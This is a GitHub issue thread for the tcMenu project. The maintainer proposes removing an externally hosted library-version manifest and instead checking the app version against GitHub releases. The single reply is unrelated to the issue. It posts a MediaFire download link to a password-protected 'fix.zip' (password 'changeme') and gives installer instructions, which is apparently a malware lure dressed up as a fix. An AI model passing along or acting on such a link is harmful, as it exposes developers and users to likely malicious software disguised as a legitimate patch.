### ISSUE TITLE
Remove the online library version and compare app version against github

### ISSUE THREAD

**Issue by davetcc** [TcMenu/tcMenu#494]
**Is your feature request related to a problem? Please describe.**
When a release is made, an increase forgotten and frustrating check was to update the library version XML that was hosted externally to the github repository. Even now, this manifest is wrong and not updated in some time.

**Describe the solution you'd like**
Both platformIO and Arduino have good library version checking inbuilt into their frameworks, we do not need to check anything other than the application version itself. The existing functionality that lists what versions are installed will be kept as it already exists and is at least somewhat useful on a diagnostic dump.

This adds the very useful functionality to indicate if the app is out of date, and offer to take the user to the releases page.

This is required to remove the documentation from thecoderscorner website.

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
